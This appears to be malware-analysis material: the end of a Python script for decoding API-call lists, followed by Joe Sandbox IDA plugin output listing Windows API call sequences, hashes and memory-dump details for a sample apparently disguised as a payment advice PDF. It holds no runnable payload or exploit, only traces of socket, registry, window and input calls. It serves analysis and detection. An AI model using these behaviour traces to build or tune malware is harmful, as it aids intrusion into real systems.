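• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008A0E47
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008A0EC9
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 008CB589
• GetWindowLongW.USER32(01624EE8,000000EC), ref: 008CB571
• _memset.LIBCMT ref: 008BF448
  • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008B61C6
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 008B620E
"""

if __name__ == "__main__":
    for c in parse_calls(SAMPLE):
        print(render(c))
```

Run it directly to print the decoded sequence, or paste further "APIs" lists into SAMPLE and extend the tables as more records are reviewed. The `?` placeholder marks arguments the plugin could not resolve statically and is passed through unchanged, so a decoded line still shows where the analyst has to read the disassembly.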
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0089DB2E
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0089DB54
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0089DB57
                                                              • SysAllocString.OLEAUT32(?), ref: 0089DB75
                                                              • SysFreeString.OLEAUT32(?), ref: 0089DB7E
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0089DBA3
                                                              • SysAllocString.OLEAUT32(?), ref: 0089DBB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: 30f3715623db2d4fd81cd764b042b31ca5523382c14273c4f773562b55947e7f
                                                              • Instruction ID: 94525acbd9f5a9deb557eeea35bc5f1d647667cef997843911da8a96d51fdcd2
                                                              • Opcode Fuzzy Hash: 30f3715623db2d4fd81cd764b042b31ca5523382c14273c4f773562b55947e7f
                                                              • Instruction Fuzzy Hash: DD218176600219AFAF10EFA8DC88CBB73ADFB09374B058526FE15DB251D6749C418768
                                                              APIs
                                                                • Part of subcall function 008B7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008B7DB6
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008B61C6
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008B61D5
                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 008B620E
                                                              • connect.WSOCK32(00000000,?,00000010), ref: 008B6217
                                                              • WSAGetLastError.WSOCK32 ref: 008B6221
                                                              • closesocket.WSOCK32(00000000), ref: 008B624A
                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 008B6263
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 910771015-0
                                                              • Opcode ID: 3cc2df1b1df6ddbe95ca4dd05fcdb4e1ee46187a63773f18372112048f48db8b
                                                              • Instruction ID: 363d42ad6b32fc051df8e609a548c2b4126e6c4070bfc4f4c49cd9c5093cfe1b
                                                              • Opcode Fuzzy Hash: 3cc2df1b1df6ddbe95ca4dd05fcdb4e1ee46187a63773f18372112048f48db8b
                                                              • Instruction Fuzzy Hash: 7F317231600118ABEF10AF68DC85FBE77B9FF45764F044029FA05D7292DB74AD148B62
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                              • API String ID: 1038674560-2734436370
                                                              • Opcode ID: bfc9eda6fb7c0f0585365b3501a999d0bd19cea115db75e65920e27921455042
                                                              • Instruction ID: 32b75e1fccbef147fe336dde5c351242a6e1277fb6f475c9b573f3be20128269
                                                              • Opcode Fuzzy Hash: bfc9eda6fb7c0f0585365b3501a999d0bd19cea115db75e65920e27921455042
                                                              • Instruction Fuzzy Hash: 11216A722042517ACA29B638AC02FA773D8FF65314F18443AF642C6153FB519D41C396
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0089DC09
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0089DC2F
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0089DC32
                                                              • SysAllocString.OLEAUT32 ref: 0089DC53
                                                              • SysFreeString.OLEAUT32 ref: 0089DC5C
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0089DC76
                                                              • SysAllocString.OLEAUT32(?), ref: 0089DC84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: 1a46c3d3893be59eddfef62d57c706ddaad07319c0c3509e9992f3fbe6c61ec4
                                                              • Instruction ID: 38bc6d29b82af20ed98d65ff6a8ba8b60f9a3ec29985645be275439af72c8791
                                                              • Opcode Fuzzy Hash: 1a46c3d3893be59eddfef62d57c706ddaad07319c0c3509e9992f3fbe6c61ec4
                                                              • Instruction Fuzzy Hash: B5217435604204AFAF14EFA8DC88DAB77EDFB08364B148125FA15CB261D674DC41CB68
                                                              APIs
                                                                • Part of subcall function 00841D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00841D73
                                                                • Part of subcall function 00841D35: GetStockObject.GDI32(00000011), ref: 00841D87
                                                                • Part of subcall function 00841D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00841D91
                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008C7632
                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008C763F
                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008C764A
                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008C7659
                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008C7665
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                              • String ID: Msctls_Progress32
                                                              • API String ID: 1025951953-3636473452
                                                              • Opcode ID: 54e6bd236948305da2456facf8857c2b0d2b5de0f3f2f29f44910cab98497886
                                                              • Instruction ID: f5f5627218d672eac02b01f11e20ec0d77a9ff282e5f54f0855a6369148bfddd
                                                              • Opcode Fuzzy Hash: 54e6bd236948305da2456facf8857c2b0d2b5de0f3f2f29f44910cab98497886
                                                              • Instruction Fuzzy Hash: 7E118EB211021DBFEF118F64CC85EE77F6DFF08798F014115BA04A20A0CA729C21DBA4
                                                              APIs
                                                              • __init_pointers.LIBCMT ref: 00869AE6
                                                                • Part of subcall function 00863187: EncodePointer.KERNEL32(00000000), ref: 0086318A
                                                                • Part of subcall function 00863187: __initp_misc_winsig.LIBCMT ref: 008631A5
                                                                • Part of subcall function 00863187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00869EA0
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00869EB4
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00869EC7
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00869EDA
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00869EED
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00869F00
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00869F13
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00869F26
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00869F39
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00869F4C
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00869F5F
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00869F72
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00869F85
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00869F98
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00869FAB
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00869FBE
                                                              • __mtinitlocks.LIBCMT ref: 00869AEB
                                                              • __mtterm.LIBCMT ref: 00869AF4
                                                                • Part of subcall function 00869B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00869AF9,00867CD0,008FA0B8,00000014), ref: 00869C56
                                                                • Part of subcall function 00869B5C: _free.LIBCMT ref: 00869C5D
                                                                • Part of subcall function 00869B5C: DeleteCriticalSection.KERNEL32(008FEC00,?,?,00869AF9,00867CD0,008FA0B8,00000014), ref: 00869C7F
                                                              • __calloc_crt.LIBCMT ref: 00869B19
                                                              • __initptd.LIBCMT ref: 00869B3B
                                                              • GetCurrentThreadId.KERNEL32 ref: 00869B42
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                              • String ID:
                                                              • API String ID: 3567560977-0
                                                              • Opcode ID: 5bd4ee6406addb827f43475c399fde7115f0c4b9bea08beab343342b482621b3
                                                              • Instruction ID: 9826d8151849d5053993a765b15196b073e945822d666a4341ac666522cf6067
                                                              • Opcode Fuzzy Hash: 5bd4ee6406addb827f43475c399fde7115f0c4b9bea08beab343342b482621b3
                                                              • Instruction Fuzzy Hash: C3F096326097215AEA357B7C7C03A5A36DDFF02731F23062AF5E4C61D2EF7084414562
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00863F85), ref: 00864085
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0086408C
                                                              • EncodePointer.KERNEL32(00000000), ref: 00864097
                                                              • DecodePointer.KERNEL32(00863F85), ref: 008640B2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                              • String ID: RoUninitialize$combase.dll
                                                              • API String ID: 3489934621-2819208100
                                                              • Opcode ID: 9dbb75d8784b0738d8baa77dcd47f2ad025258f77776c3766862eca465969ed5
                                                              • Instruction ID: 2b37dd66c2974560e80d7ff3840e31aab1d1875e01a1bd2e73376f691a681aa6
                                                              • Opcode Fuzzy Hash: 9dbb75d8784b0738d8baa77dcd47f2ad025258f77776c3766862eca465969ed5
                                                              • Instruction Fuzzy Hash: 22E0B670599300EFEB90AF71EC0DF053ABAF718742F11812AF211E12A1CBB74604EB15
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memmove$__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 3253778849-0
                                                              • Opcode ID: c501d2cfef9f23abf16beb4b3eec8b141f75e8ad3671055b0f970422b07e1cb8
                                                              • Instruction ID: 219886b750e8e30c398323a6b51cecc07a6678762cef86dc3f0d10741b3a90e9
                                                              • Opcode Fuzzy Hash: c501d2cfef9f23abf16beb4b3eec8b141f75e8ad3671055b0f970422b07e1cb8
                                                              • Instruction Fuzzy Hash: 7661AC3090065E9BDF11EF68CC82AFF37A5FF56308F094529F8599B192EB35A811CB52
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 008C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008BFDAD,?,?), ref: 008C0E31
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008C02BD
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008C02FD
                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 008C0320
                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008C0349
                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 008C038C
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 008C0399
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                              • String ID:
                                                              • API String ID: 4046560759-0
                                                              • Opcode ID: 5ec7479f20009f6fd4a7b998a03785c0edf0235ebc002fa4c904d70fc2f071d3
                                                              • Instruction ID: 4cef376e1081cbac2589dd6423b1a0969c0ddb89ad7c169c3871a175d61a0882
                                                              • Opcode Fuzzy Hash: 5ec7479f20009f6fd4a7b998a03785c0edf0235ebc002fa4c904d70fc2f071d3
                                                              • Instruction Fuzzy Hash: E8512531208244AFDB11EB68C885E6EBBB9FF84754F04491DF595C72A2DB31E905CF52
                                                              APIs
                                                              • GetMenu.USER32(?), ref: 008C57FB
                                                              • GetMenuItemCount.USER32(00000000), ref: 008C5832
                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008C585A
                                                              • GetMenuItemID.USER32(?,?), ref: 008C58C9
                                                              • GetSubMenu.USER32(?,?), ref: 008C58D7
                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 008C5928
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountMessagePostString
                                                              • String ID:
                                                              • API String ID: 650687236-0
                                                              • Opcode ID: 66faaae46277a1da2194180c5a20f00f313496f182a3900def24a2e748a1cbc2
                                                              • Instruction ID: 2818e4401e70453039735873d3658b3183ea8ee0f72ad336155133f1ee7e0d55
                                                              • Opcode Fuzzy Hash: 66faaae46277a1da2194180c5a20f00f313496f182a3900def24a2e748a1cbc2
                                                              • Instruction Fuzzy Hash: 83515C31A00619AFDF11DF68C845EAEBBB5FF48320F104069E941EB351CB75AE818B91
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 0089EF06
                                                              • VariantClear.OLEAUT32(00000013), ref: 0089EF78
                                                              • VariantClear.OLEAUT32(00000000), ref: 0089EFD3
                                                              • _memmove.LIBCMT ref: 0089EFFD
                                                              • VariantClear.OLEAUT32(?), ref: 0089F04A
                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0089F078
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                                              • String ID:
                                                              • API String ID: 1101466143-0
                                                              • Opcode ID: 725485b709dda26a087ef8751798eccb6d6398caea7ad8ad2d79956bd125fed3
                                                              • Instruction ID: b333cc90dee5e0661a255f4b25da0486f3344514fa2e87e437ea030209bea4f0
                                                              • Opcode Fuzzy Hash: 725485b709dda26a087ef8751798eccb6d6398caea7ad8ad2d79956bd125fed3
                                                              • Instruction Fuzzy Hash: D6516D75A00209DFDB14DF58C880AAAB7F9FF4C314B15856AEA59DB302E735E911CF90
                                                              APIs
                                                              • _memset.LIBCMT ref: 008A2258
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008A22A3
                                                              • IsMenu.USER32(00000000), ref: 008A22C3
                                                              • CreatePopupMenu.USER32 ref: 008A22F7
                                                              • GetMenuItemCount.USER32(000000FF), ref: 008A2355
                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 008A2386
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                              • String ID:
                                                              • API String ID: 3311875123-0
                                                              • Opcode ID: e80cd56292c5605b5551b9600cc21026e432e179376f31fad08e58d7a9b401e9
                                                              • Instruction ID: 06f3af5a93ff6590e152b79140c670a19b579a0c3cfda3b9cd9d6e7f705ea045
                                                              • Opcode Fuzzy Hash: e80cd56292c5605b5551b9600cc21026e432e179376f31fad08e58d7a9b401e9
                                                              • Instruction Fuzzy Hash: B9517630600209ABEF35CF6CD888BAEBBA5FF47318F104269E811E76A1D3759904CB51
                                                              APIs
                                                                • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
                                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 0084179A
                                                              • GetWindowRect.USER32(?,?), ref: 008417FE
                                                              • ScreenToClient.USER32(?,?), ref: 0084181B
                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0084182C
                                                              • EndPaint.USER32(?,?), ref: 00841876
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                              • String ID:
                                                              • API String ID: 1827037458-0
                                                              • Opcode ID: 705ec3c036123187c058d1ca6cd1af67905b4d3187adc81e1c274554015b02cd
                                                              • Instruction ID: fb6e6be6be28e3e467aa29a99e211f6041181a2e5ae3b2790be74ce8c224bc15
                                                              • Opcode Fuzzy Hash: 705ec3c036123187c058d1ca6cd1af67905b4d3187adc81e1c274554015b02cd
                                                              • Instruction Fuzzy Hash: 33418F301047089FDB11DF24C888FAA7BF9FB59764F144639FAA4C71A2C7309885DB62
                                                              APIs
                                                              • ShowWindow.USER32(009057B0,00000000,01624EE8,?,?,009057B0,?,008CB5A8,?,?), ref: 008CB712
                                                              • EnableWindow.USER32(00000000,00000000), ref: 008CB736
                                                              • ShowWindow.USER32(009057B0,00000000,01624EE8,?,?,009057B0,?,008CB5A8,?,?), ref: 008CB796
                                                              • ShowWindow.USER32(00000000,00000004,?,008CB5A8,?,?), ref: 008CB7A8
                                                              • EnableWindow.USER32(00000000,00000001), ref: 008CB7CC
                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 008CB7EF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$Enable$MessageSend
                                                              • String ID:
                                                              • API String ID: 642888154-0
                                                              • Opcode ID: 548a84d44cfff4a00a8c2682022b584de93554babd295c5d828a03bfa32a2a62
                                                              • Instruction ID: 15874abdc40c2e0b3a7e746762c10efbcbe8e761a60ba6b7bdb7301adc7c1c4e
                                                              • Opcode Fuzzy Hash: 548a84d44cfff4a00a8c2682022b584de93554babd295c5d828a03bfa32a2a62
                                                              • Instruction Fuzzy Hash: E5411834601644AFDB26CF28C49AF957BB1FB45314F1881A9EE48CF6A2CB31E856CB51
                                                              APIs
                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,008B4E41,?,?,00000000,00000001), ref: 008B70AC
                                                                • Part of subcall function 008B39A0: GetWindowRect.USER32(?,?), ref: 008B39B3
                                                              • GetDesktopWindow.USER32 ref: 008B70D6
                                                              • GetWindowRect.USER32(00000000), ref: 008B70DD
                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 008B710F
